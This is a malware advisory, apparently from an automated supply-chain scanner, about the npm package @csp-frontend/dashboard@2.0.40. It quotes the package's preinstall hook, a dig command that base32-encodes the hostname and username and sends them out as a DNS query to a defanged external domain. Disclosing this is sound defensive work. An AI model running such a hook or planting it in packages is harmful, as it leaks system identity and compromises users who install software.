LWA-2026-0210 confirmed malware

@csp-frontend/dashboard@2.0.40

Malicious code in @csp-frontend/dashboard (npm)

Analysis

Critical finding: preinstall hook contains DNS exfiltration payload. The hook executes `dig +short "$(echo cf-$(hostname)-$(whoami) | base32 | tr -d '=' | rev).canary[.]rebind[.]fun[.]offensive[.]work"` which captures system info (hostname, username), base32-encodes it, and exfiltrates via DNS query to an external canary domain. This is a classic supply-chain attack pattern for data exfiltration. Publisher email [account] suggests offensive security testing origin, but this is still malicious code in the npm supply chain requiring human review.

analyzed by
Leitwacht
first seen
May 27, 2026, 04:28 AM
analyzed
May 27, 2026, 04:32 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.